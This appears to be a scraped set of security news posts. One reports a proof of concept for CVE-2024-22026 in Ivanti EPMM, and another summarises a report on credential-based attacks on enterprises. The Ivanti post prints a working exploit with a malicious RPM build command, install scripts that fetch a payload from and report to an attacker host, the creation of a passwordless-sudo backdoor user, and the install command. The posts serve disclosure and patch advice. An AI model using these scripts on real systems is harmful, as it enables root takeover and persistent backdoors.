Android spyware camouflaged as VPN, chat apps on Google Play

PoC Exploit Released for Ivanti EPMM MobileIron Core

A newly disclosed vulnerability, CVE-2024-22026, has been found in Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core.

This vulnerability allows a local attacker to gain root access to affected systems.

The severity of this vulnerability is currently undetermined.

CVE-2024-22026: Local Privilege Escalation Vulnerability

The attack vector for CVE-2024-22026 is local, meaning the attacker must have local access to the system to exploit the vulnerability, as per reports by Github.

Once exploited, the attacker can gain root access, which provides full control over the system and can potentially lead to significant security breaches.

Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers

Discovery

The device uses the following command as a low-privilege user to get and install RPM packages:

install rpm url <remote url>

This command is a CLI wrapper for the following to occur, which runs as root:

/bin/rpm -Uvh *.rpm

It’s possible to run any RPM package because the RPM command itself doesn’t check signatures or block URLs. An attacker can create a fake RPM package and send it to the device, making it vulnerable.

Exploitation PoCCreating the Malicious RPM

The following command is used to create a malicious RPM package:

fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 –description “Ivanti POC” –maintainer “exploit-poc” –before-install preinstall.sh –after-install postinstall.sh -C .

Preinstall Script (preinstall.sh)

#!/bin/sh

curl -O http://<attacker_IP>/poc

exit 0

Postinstall Script (postinstall.sh)

#!/bin/sh

set -e  # Enable strict error checking

# Report back current user and privilege level

CURRENT_USER=$(whoami | base64)

PRIV_LEVEL=$(id -u | base64)

curl http://<attacker_IP>/poc?user=$CURRENT_USER

curl http://<attacker_IP>/poc?priv=$PRIV_LEVEL

# Create a new root user

if ! useradd -s /bin/sh -m exploit-poc; then

  echo “Failed to add user ‘exploit-poc'” >&2

  exit 1

fi

echo “exploit-poc:<redacted_password>” | chpasswd

 # Grant root privileges

if ! echo “exploit-poc ALL=(ALL) NOPASSWD: ALL” >> /etc/sudoers; then

  echo “Failed to modify sudoers file” >&2

  exit 1

fi

exit 0

Running the CLI Command to Fetch the RPM: To take advantage of the flaw, the attacker would use the code below in the CLI to get the malicious RPM and install it:

install rpm url http://<attacker_IP>/ivanti-privesc-13.37-1.i386.rpm

Ivanti has released patches to address this vulnerability in versions 12.1.0.0, 12.0.0.0, and 11.12.0.1.

It is strongly recommended that users update these versions to mitigate the risk associated with CVE-2024-22026.

On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free

The post PoC Exploit Released for Ivanti EPMM MobileIron Core appeared first on Cyber Security News.

 Read More 

 

Huge Surge In Attacks Exploiting User Credentials To Hack Enterprises

[[{“value”:”

There are currently billions of compromised credentials available on the Dark Web, making it the easiest route for criminals to exploit legitimate accounts.

Info-stealing malware, which is meant to obtain personally identifiable information such as email addresses, passwords for social networking and messaging apps, bank account information, cryptocurrency wallet data, and more, is expected to increase 266% in 2023.

This indicates that attackers were investing greater resources in identity theft.

Major attacks triggered by attackers using legitimate accounts required approximately 200% more sophisticated response procedures from security teams than the average incident, with defenders having to discern between legitimate and malicious user behavior on the network. 

This extensive monitoring of users’ online behavior was made clear when the FBI and European law enforcement took down a global criminal forum in April 2023, gathering the login credentials of over 80 million accounts. 

Threats based on identity will probably keep increasing as long as adversaries use generative AI to make their attacks more effective.

“In 2023, we observed over 800,000 posts on AI and GPT across Dark Web forums, reaffirming these innovations have caught cybercriminals attention and interest”, the X-Force Threat Intelligence team said.

Document

Analyse Shopisticated Malware with ANY.RUN

Try ANY.RUN Yourself with a 14-day Free Trial

More than 300,000 analysts use ANY.RUN is a malware analysis sandbox worldwide. Join the community to conduct in-depth investigations into the top threats and collect detailed reports on their behavior..

Request a Demo For Free

Targeting Critical Infrastructure Organizations

Critical infrastructure firms were the target of roughly 70% of attacks. This is a concerning statistic that shows that cybercriminals are betting on these high-value targets’ requirements for uptime to achieve their goals.

Phishing emails, the use of legitimate accounts, and the exploitation of public-facing applications were the causes of over 85% of the attacks.

With DHS CISA reporting that most successful attacks against government agencies, critical infrastructure companies, and state-level government bodies in 2022 featured the use of legitimate accounts, the latter presents a higher risk to the industry.

The report also mentions that the security industry’s traditional view of “basic security” may not be as feasible, as evidenced by the fact that compromise could have been avoided in approximately 85% of attacks on important sectors through the use of patching, multi-factor authentication, or least-privilege principles.

Exploitation Of User Identities Poses Serious Threat To Organizations

“Our findings reveal that identity is increasingly being weaponized against enterprises, exploiting valid accounts and compromising credentials.

It also shows us that the biggest security concern for enterprises stems not from novel or cryptic threats, but from well-known and existing ones.” reads the report.

According to the data, a startling 50% of cyberattacks in the UK started by using legitimate accounts as the attack vector, and another 25% of cases included using public-facing applications. 

According to IBM, attacks resulting from the use of legitimate accounts increased 66% in Europe between the previous year and 2023, making the region the most targeted globally.

The report highlights that nearly a percent of cyberattacks rely on legitimate accounts to gain initial access, which poses serious obstacles to organizations’ efforts to recover.

Businesses need to take a strategic strategy to counter this danger, incorporating contemporary security practices to reduce risks and fortify their defenses against the always-changing field of cyberattacks.

You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with Perimeter81 malware protection. All are extremely harmful, can wreak havoc, and damage your network.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

The post Huge Surge In Attacks Exploiting User Credentials To Hack Enterprises appeared first on Cyber Security News.

“}]]   Read More 

Cyber Security News